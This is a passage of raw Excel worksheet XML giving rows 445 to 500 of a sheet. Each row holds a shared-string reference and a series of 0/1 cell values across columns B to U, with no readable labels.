      <c r="A445" s="7" t="s">
        <v>448</v>
      </c>
      <c r="B445" s="1">
        <v>0</v>
      </c>
      <c r="C445" s="12">
        <v>0</v>
      </c>
      <c r="D445" s="9">
        <v>0</v>
      </c>
      <c r="E445" s="9">
        <v>1</v>
      </c>
      <c r="F445" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U445" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="446" spans="1:21">
      <c r="A446" s="7" t="s">
        <v>449</v>
      </c>
      <c r="B446" s="1">
        <v>1</v>
      </c>
      <c r="C446" s="12">
        <v>0</v>
      </c>
      <c r="D446" s="9">
        <v>0</v>
      </c>
      <c r="E446" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U446" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="447" spans="1:21">
      <c r="A447" s="7" t="s">
        <v>450</v>
      </c>
      <c r="B447" s="1">
        <v>1</v>
      </c>
      <c r="C447" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U447" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="448" spans="1:21" ht="24">
      <c r="A448" s="7" t="s">
        <v>451</v>
      </c>
      <c r="B448" s="1">
        <v>1</v>
      </c>
      <c r="C448" s="12">
        <v>0</v>
      </c>
      <c r="D448" s="9">
        <v>0</v>
      </c>
      <c r="E448" s="9">
        <v>1</v>
      </c>
      <c r="F448" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U448" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="449" spans="1:21" ht="24">
      <c r="A449" s="7" t="s">
        <v>452</v>
      </c>
      <c r="B449" s="1">
        <v>1</v>
      </c>
      <c r="C449" s="12">
        <v>0</v>
      </c>
      <c r="D449" s="9">
        <v>0</v>
      </c>
      <c r="E449" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U449" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="450" spans="1:21" ht="24">
      <c r="A450" s="7" t="s">
        <v>453</v>
      </c>
      <c r="B450" s="1">
        <v>1</v>
      </c>
      <c r="C450" s="12">
        <v>1</v>
      </c>
      <c r="D450" s="9">
        <v>0</v>
      </c>
      <c r="E450" s="9">
        <v>1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1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1</v>
      </c>
      <c r="S450" s="12">
        <v>0</v>
      </c>
      <c r="T450" s="17">
        <v>0</v>
      </c>
      <c r="U450" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="451" spans="1:21">
      <c r="A451" s="7" t="s">
        <v>454</v>
      </c>
      <c r="B451" s="1">
        <v>1</v>
      </c>
      <c r="C451" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U451" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="452" spans="1:21" ht="24">
      <c r="A452" s="7" t="s">
        <v>455</v>
      </c>
      <c r="B452" s="1">
        <v>1</v>
      </c>
      <c r="C452" s="12">
        <v>0</v>
      </c>
      <c r="D452" s="9">
        <v>0</v>
      </c>
      <c r="E452" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U452" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="453" spans="1:21">
      <c r="A453" s="7" t="s">
        <v>456</v>
      </c>
      <c r="B453" s="1">
        <v>1</v>
      </c>
      <c r="C453" s="12">
        <v>0</v>
      </c>
      <c r="D453" s="9">
        <v>0</v>
      </c>
      <c r="E453" s="9">
        <v>0</v>
      </c>
      <c r="F453" s="9">
        <v>1</v>
      </c>
      <c r="G453" s="9">
        <v>0</v>
      </c>
      <c r="H453" s="9">
        <v>1</v>
      </c>
      <c r="I453" s="9">
        <v>0</v>
      </c>
      <c r="J453" s="9">
        <v>0</v>
      </c>
      <c r="K453" s="9">
        <v>0</v>
      </c>
      <c r="L453" s="9">
        <v>0</v>
      </c>
      <c r="M453" s="1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7">
        <v>0</v>
      </c>
      <c r="U453" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="454" spans="1:21">
      <c r="A454" s="7" t="s">
        <v>457</v>
      </c>
      <c r="B454" s="1">
        <v>1</v>
      </c>
      <c r="C454" s="12">
        <v>0</v>
      </c>
      <c r="D454" s="9">
        <v>0</v>
      </c>
      <c r="E454" s="9">
        <v>1</v>
      </c>
      <c r="F454" s="9">
        <v>1</v>
      </c>
      <c r="G454" s="9">
        <v>0</v>
      </c>
      <c r="H454" s="9">
        <v>1</v>
      </c>
      <c r="I454" s="9">
        <v>0</v>
      </c>
      <c r="J454" s="9">
        <v>0</v>
      </c>
      <c r="K454" s="9">
        <v>0</v>
      </c>
      <c r="L454" s="9">
        <v>0</v>
      </c>
      <c r="M454" s="1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7">
        <v>0</v>
      </c>
      <c r="U454" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="455" spans="1:21" ht="24">
      <c r="A455" s="7" t="s">
        <v>458</v>
      </c>
      <c r="B455" s="1">
        <v>1</v>
      </c>
      <c r="C455" s="12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1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7">
        <v>1</v>
      </c>
      <c r="U455" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="456" spans="1:21" ht="24">
      <c r="A456" s="7" t="s">
        <v>459</v>
      </c>
      <c r="B456" s="1">
        <v>1</v>
      </c>
      <c r="C456" s="12">
        <v>0</v>
      </c>
      <c r="D456" s="9">
        <v>0</v>
      </c>
      <c r="E456" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U456" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="457" spans="1:21" ht="24">
      <c r="A457" s="7" t="s">
        <v>460</v>
      </c>
      <c r="B457" s="1">
        <v>1</v>
      </c>
      <c r="C457" s="12">
        <v>1</v>
      </c>
      <c r="D457" s="9">
        <v>0</v>
      </c>
      <c r="E457" s="9">
        <v>0</v>
      </c>
      <c r="F457" s="9">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N457" s="12">
        <v>0</v>
      </c>
      <c r="O457" s="12">
        <v>0</v>
      </c>
      <c r="P457" s="12">
        <v>0</v>
      </c>
      <c r="Q457" s="12">
        <v>1</v>
      </c>
      <c r="R457" s="12">
        <v>0</v>
      </c>
      <c r="S457" s="12">
        <v>0</v>
      </c>
      <c r="T457" s="17">
        <v>0</v>
      </c>
      <c r="U457" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="458" spans="1:21" ht="72">
      <c r="A458" s="7" t="s">
        <v>461</v>
      </c>
      <c r="B458" s="1">
        <v>0</v>
      </c>
      <c r="C458" s="12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1</v>
      </c>
      <c r="M458" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U458" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="459" spans="1:21">
      <c r="A459" s="7" t="s">
        <v>462</v>
      </c>
      <c r="B459" s="1">
        <v>1</v>
      </c>
      <c r="C459" s="12">
        <v>0</v>
      </c>
      <c r="D459" s="9">
        <v>0</v>
      </c>
      <c r="E459" s="9">
        <v>0</v>
      </c>
      <c r="F459" s="9">
        <v>0</v>
      </c>
      <c r="G459" s="9">
        <v>0</v>
      </c>
      <c r="H459" s="9">
        <v>1</v>
      </c>
      <c r="I459" s="9">
        <v>0</v>
      </c>
      <c r="J459" s="9">
        <v>0</v>
      </c>
      <c r="K459" s="9">
        <v>0</v>
      </c>
      <c r="L459" s="9">
        <v>0</v>
      </c>
      <c r="M459" s="1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7">
        <v>0</v>
      </c>
      <c r="U459" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="460" spans="1:21">
      <c r="A460" s="7" t="s">
        <v>463</v>
      </c>
      <c r="B460" s="1">
        <v>1</v>
      </c>
      <c r="C460" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U460" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="461" spans="1:21" ht="24">
      <c r="A461" s="7" t="s">
        <v>464</v>
      </c>
      <c r="B461" s="1">
        <v>1</v>
      </c>
      <c r="C461" s="12">
        <v>0</v>
      </c>
      <c r="D461" s="9">
        <v>0</v>
      </c>
      <c r="E461" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U461" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="462" spans="1:21" ht="24">
      <c r="A462" s="7" t="s">
        <v>465</v>
      </c>
      <c r="B462" s="1">
        <v>1</v>
      </c>
      <c r="C462" s="12">
        <v>0</v>
      </c>
      <c r="D462" s="9">
        <v>0</v>
      </c>
      <c r="E462" s="9">
        <v>0</v>
      </c>
      <c r="F462" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U462" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="463" spans="1:21">
      <c r="A463" s="7" t="s">
        <v>466</v>
      </c>
      <c r="B463" s="1">
        <v>0</v>
      </c>
      <c r="C463" s="12">
        <v>0</v>
      </c>
      <c r="D463" s="9">
        <v>0</v>
      </c>
      <c r="E463" s="9">
        <v>1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1</v>
      </c>
      <c r="M463" s="1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7">
        <v>0</v>
      </c>
      <c r="U463" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="464" spans="1:21" ht="24">
      <c r="A464" s="7" t="s">
        <v>467</v>
      </c>
      <c r="B464" s="1">
        <v>1</v>
      </c>
      <c r="C464" s="12">
        <v>1</v>
      </c>
      <c r="D464" s="9">
        <v>0</v>
      </c>
      <c r="E464" s="9">
        <v>1</v>
      </c>
      <c r="F464" s="9">
        <v>0</v>
      </c>
      <c r="G464" s="9">
        <v>0</v>
      </c>
      <c r="H464" s="9">
        <v>1</v>
      </c>
      <c r="I464" s="9">
        <v>0</v>
      </c>
      <c r="J464" s="9">
        <v>0</v>
      </c>
      <c r="K464" s="9">
        <v>0</v>
      </c>
      <c r="L464" s="9">
        <v>0</v>
      </c>
      <c r="M464" s="1">
        <v>0</v>
      </c>
      <c r="N464" s="12">
        <v>0</v>
      </c>
      <c r="O464" s="12">
        <v>0</v>
      </c>
      <c r="P464" s="12">
        <v>0</v>
      </c>
      <c r="Q464" s="12">
        <v>1</v>
      </c>
      <c r="R464" s="12">
        <v>0</v>
      </c>
      <c r="S464" s="12">
        <v>0</v>
      </c>
      <c r="T464" s="17">
        <v>0</v>
      </c>
      <c r="U464" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="465" spans="1:21">
      <c r="A465" s="7" t="s">
        <v>468</v>
      </c>
      <c r="B465" s="1">
        <v>1</v>
      </c>
      <c r="C465" s="12">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U465" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="466" spans="1:21" ht="24">
      <c r="A466" s="7" t="s">
        <v>469</v>
      </c>
      <c r="B466" s="1">
        <v>1</v>
      </c>
      <c r="C466" s="12">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N466" s="12">
        <v>0</v>
      </c>
      <c r="O466" s="12">
        <v>0</v>
      </c>
      <c r="P466" s="12">
        <v>1</v>
      </c>
      <c r="Q466" s="12">
        <v>0</v>
      </c>
      <c r="R466" s="12">
        <v>0</v>
      </c>
      <c r="S466" s="12">
        <v>0</v>
      </c>
      <c r="T466" s="17">
        <v>0</v>
      </c>
      <c r="U466" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="467" spans="1:21" ht="24">
      <c r="A467" s="7" t="s">
        <v>470</v>
      </c>
      <c r="B467" s="1">
        <v>1</v>
      </c>
      <c r="C467" s="12">
        <v>0</v>
      </c>
      <c r="D467" s="9">
        <v>0</v>
      </c>
      <c r="E467" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U467" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="468" spans="1:21" ht="36">
      <c r="A468" s="7" t="s">
        <v>471</v>
      </c>
      <c r="B468" s="1">
        <v>0</v>
      </c>
      <c r="C468" s="12">
        <v>0</v>
      </c>
      <c r="D468" s="9">
        <v>0</v>
      </c>
      <c r="E468" s="9">
        <v>0</v>
      </c>
      <c r="F468" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U468" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="469" spans="1:21" ht="24">
      <c r="A469" s="7" t="s">
        <v>472</v>
      </c>
      <c r="B469" s="1">
        <v>1</v>
      </c>
      <c r="C469" s="12">
        <v>0</v>
      </c>
      <c r="D469" s="9">
        <v>0</v>
      </c>
      <c r="E469" s="9">
        <v>1</v>
      </c>
      <c r="F469" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U469" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="470" spans="1:21">
      <c r="A470" s="7" t="s">
        <v>473</v>
      </c>
      <c r="B470" s="1">
        <v>1</v>
      </c>
      <c r="C470" s="12">
        <v>0</v>
      </c>
      <c r="D470" s="9">
        <v>0</v>
      </c>
      <c r="E470" s="9">
        <v>1</v>
      </c>
      <c r="F470" s="9">
        <v>1</v>
      </c>
      <c r="G470" s="9">
        <v>0</v>
      </c>
      <c r="H470" s="9">
        <v>0</v>
      </c>
      <c r="I470" s="9">
        <v>0</v>
      </c>
      <c r="J470" s="9">
        <v>1</v>
      </c>
      <c r="K470" s="9">
        <v>0</v>
      </c>
      <c r="L470" s="9">
        <v>0</v>
      </c>
      <c r="M470" s="1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7">
        <v>0</v>
      </c>
      <c r="U470" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="471" spans="1:21">
      <c r="A471" s="7" t="s">
        <v>474</v>
      </c>
      <c r="B471" s="1">
        <v>1</v>
      </c>
      <c r="C471" s="12">
        <v>0</v>
      </c>
      <c r="D471" s="9">
        <v>0</v>
      </c>
      <c r="E471" s="9">
        <v>1</v>
      </c>
      <c r="F471" s="9">
        <v>1</v>
      </c>
      <c r="G471" s="9">
        <v>0</v>
      </c>
      <c r="H471" s="9">
        <v>1</v>
      </c>
      <c r="I471" s="9">
        <v>0</v>
      </c>
      <c r="J471" s="9">
        <v>0</v>
      </c>
      <c r="K471" s="9">
        <v>0</v>
      </c>
      <c r="L471" s="9">
        <v>0</v>
      </c>
      <c r="M471" s="1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7">
        <v>0</v>
      </c>
      <c r="U471" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="472" spans="1:21" ht="24">
      <c r="A472" s="7" t="s">
        <v>475</v>
      </c>
      <c r="B472" s="1">
        <v>1</v>
      </c>
      <c r="C472" s="12">
        <v>0</v>
      </c>
      <c r="D472" s="9">
        <v>0</v>
      </c>
      <c r="E472" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U472" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="473" spans="1:21">
      <c r="A473" s="7" t="s">
        <v>476</v>
      </c>
      <c r="B473" s="1">
        <v>1</v>
      </c>
      <c r="C473" s="12">
        <v>0</v>
      </c>
      <c r="D473" s="9">
        <v>0</v>
      </c>
      <c r="E473" s="9">
        <v>0</v>
      </c>
      <c r="F473" s="9">
        <v>1</v>
      </c>
      <c r="G473" s="9">
        <v>0</v>
      </c>
      <c r="H473" s="9">
        <v>1</v>
      </c>
      <c r="I473" s="9">
        <v>0</v>
      </c>
      <c r="J473" s="9">
        <v>0</v>
      </c>
      <c r="K473" s="9">
        <v>0</v>
      </c>
      <c r="L473" s="9">
        <v>0</v>
      </c>
      <c r="M473" s="1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7">
        <v>0</v>
      </c>
      <c r="U473" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="474" spans="1:21" ht="24">
      <c r="A474" s="7" t="s">
        <v>477</v>
      </c>
      <c r="B474" s="1">
        <v>1</v>
      </c>
      <c r="C474" s="12">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U474" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="475" spans="1:21">
      <c r="A475" s="7" t="s">
        <v>478</v>
      </c>
      <c r="B475" s="1">
        <v>0</v>
      </c>
      <c r="C475" s="12">
        <v>0</v>
      </c>
      <c r="D475" s="9">
        <v>1</v>
      </c>
      <c r="E475" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U475" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="476" spans="1:21">
      <c r="A476" s="7" t="s">
        <v>479</v>
      </c>
      <c r="B476" s="1">
        <v>1</v>
      </c>
      <c r="C476" s="12">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U476" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="477" spans="1:21" ht="24">
      <c r="A477" s="7" t="s">
        <v>480</v>
      </c>
      <c r="B477" s="1">
        <v>1</v>
      </c>
      <c r="C477" s="12">
        <v>0</v>
      </c>
      <c r="D477" s="9">
        <v>0</v>
      </c>
      <c r="E477" s="9">
        <v>0</v>
      </c>
      <c r="F477" s="9">
        <v>1</v>
      </c>
      <c r="G477" s="9">
        <v>0</v>
      </c>
      <c r="H477" s="9">
        <v>1</v>
      </c>
      <c r="I477" s="9">
        <v>0</v>
      </c>
      <c r="J477" s="9">
        <v>0</v>
      </c>
      <c r="K477" s="9">
        <v>0</v>
      </c>
      <c r="L477" s="9">
        <v>0</v>
      </c>
      <c r="M477" s="1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7">
        <v>0</v>
      </c>
      <c r="U477" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="478" spans="1:21" ht="24">
      <c r="A478" s="7" t="s">
        <v>481</v>
      </c>
      <c r="B478" s="1">
        <v>0</v>
      </c>
      <c r="C478" s="12">
        <v>1</v>
      </c>
      <c r="D478" s="9">
        <v>0</v>
      </c>
      <c r="E478" s="9">
        <v>1</v>
      </c>
      <c r="F478" s="9">
        <v>1</v>
      </c>
      <c r="G478" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U478" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="479" spans="1:21">
      <c r="A479" s="7" t="s">
        <v>482</v>
      </c>
      <c r="B479" s="1">
        <v>0</v>
      </c>
      <c r="C479" s="12">
        <v>0</v>
      </c>
      <c r="D479" s="9">
        <v>0</v>
      </c>
      <c r="E479" s="9">
        <v>1</v>
      </c>
      <c r="F479" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U479" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="480" spans="1:21" ht="24">
      <c r="A480" s="7" t="s">
        <v>483</v>
      </c>
      <c r="B480" s="1">
        <v>1</v>
      </c>
      <c r="C480" s="12">
        <v>1</v>
      </c>
      <c r="D480" s="9">
        <v>0</v>
      </c>
      <c r="E480" s="9">
        <v>1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0</v>
      </c>
      <c r="L480" s="9">
        <v>0</v>
      </c>
      <c r="M480" s="1">
        <v>0</v>
      </c>
      <c r="N480" s="12">
        <v>0</v>
      </c>
      <c r="O480" s="12">
        <v>1</v>
      </c>
      <c r="P480" s="12">
        <v>0</v>
      </c>
      <c r="Q480" s="12">
        <v>0</v>
      </c>
      <c r="R480" s="12">
        <v>0</v>
      </c>
      <c r="S480" s="12">
        <v>0</v>
      </c>
      <c r="T480" s="17">
        <v>0</v>
      </c>
      <c r="U480" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="481" spans="1:21" ht="24">
      <c r="A481" s="7" t="s">
        <v>484</v>
      </c>
      <c r="B481" s="1">
        <v>1</v>
      </c>
      <c r="C481" s="12">
        <v>0</v>
      </c>
      <c r="D481" s="9">
        <v>0</v>
      </c>
      <c r="E481" s="9">
        <v>0</v>
      </c>
      <c r="F481" s="9">
        <v>1</v>
      </c>
      <c r="G481" s="9">
        <v>0</v>
      </c>
      <c r="H481" s="9">
        <v>1</v>
      </c>
      <c r="I481" s="9">
        <v>0</v>
      </c>
      <c r="J481" s="9">
        <v>0</v>
      </c>
      <c r="K481" s="9">
        <v>0</v>
      </c>
      <c r="L481" s="9">
        <v>0</v>
      </c>
      <c r="M481" s="1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7">
        <v>0</v>
      </c>
      <c r="U481" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="482" spans="1:21">
      <c r="A482" s="7" t="s">
        <v>485</v>
      </c>
      <c r="B482" s="1">
        <v>1</v>
      </c>
      <c r="C482" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U482" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="483" spans="1:21">
      <c r="A483" s="7" t="s">
        <v>486</v>
      </c>
      <c r="B483" s="1">
        <v>1</v>
      </c>
      <c r="C483" s="12">
        <v>0</v>
      </c>
      <c r="D483" s="9">
        <v>0</v>
      </c>
      <c r="E483" s="9">
        <v>0</v>
      </c>
      <c r="F483" s="9">
        <v>1</v>
      </c>
      <c r="G483" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U483" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="484" spans="1:21" ht="24">
      <c r="A484" s="7" t="s">
        <v>487</v>
      </c>
      <c r="B484" s="1">
        <v>1</v>
      </c>
      <c r="C484" s="12">
        <v>0</v>
      </c>
      <c r="D484" s="9">
        <v>0</v>
      </c>
      <c r="E484" s="9">
        <v>0</v>
      </c>
      <c r="F484" s="9">
        <v>1</v>
      </c>
      <c r="G484" s="9">
        <v>0</v>
      </c>
      <c r="H484" s="9">
        <v>1</v>
      </c>
      <c r="I484" s="9">
        <v>0</v>
      </c>
      <c r="J484" s="9">
        <v>0</v>
      </c>
      <c r="K484" s="9">
        <v>0</v>
      </c>
      <c r="L484" s="9">
        <v>0</v>
      </c>
      <c r="M484" s="1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7">
        <v>0</v>
      </c>
      <c r="U484" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="485" spans="1:21">
      <c r="A485" s="7" t="s">
        <v>488</v>
      </c>
      <c r="B485" s="1">
        <v>0</v>
      </c>
      <c r="C485" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U485" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="486" spans="1:21">
      <c r="A486" s="7" t="s">
        <v>489</v>
      </c>
      <c r="B486" s="1">
        <v>1</v>
      </c>
      <c r="C486" s="12">
        <v>0</v>
      </c>
      <c r="D486" s="9">
        <v>0</v>
      </c>
      <c r="E486" s="9">
        <v>0</v>
      </c>
      <c r="F486" s="9">
        <v>1</v>
      </c>
      <c r="G486" s="9">
        <v>0</v>
      </c>
      <c r="H486" s="9">
        <v>1</v>
      </c>
      <c r="I486" s="9">
        <v>0</v>
      </c>
      <c r="J486" s="9">
        <v>0</v>
      </c>
      <c r="K486" s="9">
        <v>0</v>
      </c>
      <c r="L486" s="9">
        <v>0</v>
      </c>
      <c r="M486" s="1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7">
        <v>0</v>
      </c>
      <c r="U486" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="487" spans="1:21" ht="24">
      <c r="A487" s="7" t="s">
        <v>490</v>
      </c>
      <c r="B487" s="1">
        <v>1</v>
      </c>
      <c r="C487" s="12">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U487" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="488" spans="1:21" ht="48">
      <c r="A488" s="7" t="s">
        <v>491</v>
      </c>
      <c r="B488" s="1">
        <v>1</v>
      </c>
      <c r="C488" s="12">
        <v>1</v>
      </c>
      <c r="D488" s="9">
        <v>0</v>
      </c>
      <c r="E488" s="9">
        <v>1</v>
      </c>
      <c r="F488" s="9">
        <v>0</v>
      </c>
      <c r="G488" s="9">
        <v>0</v>
      </c>
      <c r="H488" s="9">
        <v>1</v>
      </c>
      <c r="I488" s="9">
        <v>0</v>
      </c>
      <c r="J488" s="9">
        <v>0</v>
      </c>
      <c r="K488" s="9">
        <v>0</v>
      </c>
      <c r="L488" s="9">
        <v>0</v>
      </c>
      <c r="M488" s="1">
        <v>0</v>
      </c>
      <c r="N488" s="12">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U488" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="489" spans="1:21" ht="24">
      <c r="A489" s="7" t="s">
        <v>492</v>
      </c>
      <c r="B489" s="1">
        <v>1</v>
      </c>
      <c r="C489" s="12">
        <v>0</v>
      </c>
      <c r="D489" s="9">
        <v>0</v>
      </c>
      <c r="E489" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U489" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="490" spans="1:21" ht="24">
      <c r="A490" s="7" t="s">
        <v>493</v>
      </c>
      <c r="B490" s="1">
        <v>1</v>
      </c>
      <c r="C490" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U490" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="491" spans="1:21">
      <c r="A491" s="7" t="s">
        <v>494</v>
      </c>
      <c r="B491" s="1">
        <v>1</v>
      </c>
      <c r="C491" s="12">
        <v>0</v>
      </c>
      <c r="D491" s="9">
        <v>0</v>
      </c>
      <c r="E491" s="9">
        <v>0</v>
      </c>
      <c r="F491" s="9">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U491" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="492" spans="1:21">
      <c r="A492" s="7" t="s">
        <v>495</v>
      </c>
      <c r="B492" s="1">
        <v>1</v>
      </c>
      <c r="C492" s="12">
        <v>0</v>
      </c>
      <c r="D492" s="9">
        <v>0</v>
      </c>
      <c r="E492" s="9">
        <v>1</v>
      </c>
      <c r="F492" s="9">
        <v>1</v>
      </c>
      <c r="G492" s="9">
        <v>0</v>
      </c>
      <c r="H492" s="9">
        <v>1</v>
      </c>
      <c r="I492" s="9">
        <v>0</v>
      </c>
      <c r="J492" s="9">
        <v>0</v>
      </c>
      <c r="K492" s="9">
        <v>0</v>
      </c>
      <c r="L492" s="9">
        <v>0</v>
      </c>
      <c r="M492" s="1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7">
        <v>0</v>
      </c>
      <c r="U492" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="493" spans="1:21" ht="84">
      <c r="A493" s="7" t="s">
        <v>496</v>
      </c>
      <c r="B493" s="1">
        <v>0</v>
      </c>
      <c r="C493" s="12">
        <v>0</v>
      </c>
      <c r="D493" s="9">
        <v>0</v>
      </c>
      <c r="E493" s="9">
        <v>1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1</v>
      </c>
      <c r="M493" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U493" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="494" spans="1:21" ht="24">
      <c r="A494" s="7" t="s">
        <v>497</v>
      </c>
      <c r="B494" s="1">
        <v>0</v>
      </c>
      <c r="C494" s="12">
        <v>0</v>
      </c>
      <c r="D494" s="9">
        <v>0</v>
      </c>
      <c r="E494" s="9">
        <v>0</v>
      </c>
      <c r="F494" s="9">
        <v>1</v>
      </c>
      <c r="G494" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U494" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="495" spans="1:21" ht="24">
      <c r="A495" s="7" t="s">
        <v>498</v>
      </c>
      <c r="B495" s="1">
        <v>1</v>
      </c>
      <c r="C495" s="12">
        <v>1</v>
      </c>
      <c r="D495" s="9">
        <v>0</v>
      </c>
      <c r="E495" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U495" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="496" spans="1:21" ht="24">
      <c r="A496" s="7" t="s">
        <v>499</v>
      </c>
      <c r="B496" s="1">
        <v>1</v>
      </c>
      <c r="C496" s="12">
        <v>1</v>
      </c>
      <c r="D496" s="9">
        <v>0</v>
      </c>
      <c r="E496" s="9">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N496" s="12">
        <v>0</v>
      </c>
      <c r="O496" s="12">
        <v>1</v>
      </c>
      <c r="P496" s="12">
        <v>0</v>
      </c>
      <c r="Q496" s="12">
        <v>0</v>
      </c>
      <c r="R496" s="12">
        <v>0</v>
      </c>
      <c r="S496" s="12">
        <v>0</v>
      </c>
      <c r="T496" s="17">
        <v>0</v>
      </c>
      <c r="U496" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="497" spans="1:21" ht="24">
      <c r="A497" s="7" t="s">
        <v>500</v>
      </c>
      <c r="B497" s="1">
        <v>1</v>
      </c>
      <c r="C497" s="12">
        <v>1</v>
      </c>
      <c r="D497" s="9">
        <v>0</v>
      </c>
      <c r="E497" s="9">
        <v>1</v>
      </c>
      <c r="F497" s="9">
        <v>0</v>
      </c>
      <c r="G497" s="9">
        <v>0</v>
      </c>
      <c r="H497" s="9">
        <v>1</v>
      </c>
      <c r="I497" s="9">
        <v>0</v>
      </c>
      <c r="J497" s="9">
        <v>0</v>
      </c>
      <c r="K497" s="9">
        <v>0</v>
      </c>
      <c r="L497" s="9">
        <v>0</v>
      </c>
      <c r="M497" s="1">
        <v>0</v>
      </c>
      <c r="N497" s="12">
        <v>0</v>
      </c>
      <c r="O497" s="12">
        <v>0</v>
      </c>
      <c r="P497" s="12">
        <v>0</v>
      </c>
      <c r="Q497" s="12">
        <v>1</v>
      </c>
      <c r="R497" s="12">
        <v>0</v>
      </c>
      <c r="S497" s="12">
        <v>0</v>
      </c>
      <c r="T497" s="17">
        <v>0</v>
      </c>
      <c r="U497" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="498" spans="1:21" ht="24">
      <c r="A498" s="7" t="s">
        <v>501</v>
      </c>
      <c r="B498" s="1">
        <v>1</v>
      </c>
      <c r="C498" s="12">
        <v>1</v>
      </c>
      <c r="D498" s="9">
        <v>0</v>
      </c>
      <c r="E498" s="9">
        <v>1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1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1</v>
      </c>
      <c r="S498" s="12">
        <v>0</v>
      </c>
      <c r="T498" s="17">
        <v>0</v>
      </c>
      <c r="U498" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="499" spans="1:21">
      <c r="A499" s="7" t="s">
        <v>502</v>
      </c>
      <c r="B499" s="1">
        <v>0</v>
      </c>
      <c r="C499" s="12">
        <v>1</v>
      </c>
      <c r="D499" s="9">
        <v>1</v>
      </c>
      <c r="E499" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U499" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="500" spans="1:21">
      <c r="A500" s="7" t="s">
        <v>503</v>
      </c>
      <c r="B500" s="1">
        <v>1</v>
      </c>
      <c r="C500" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U500" s="1">
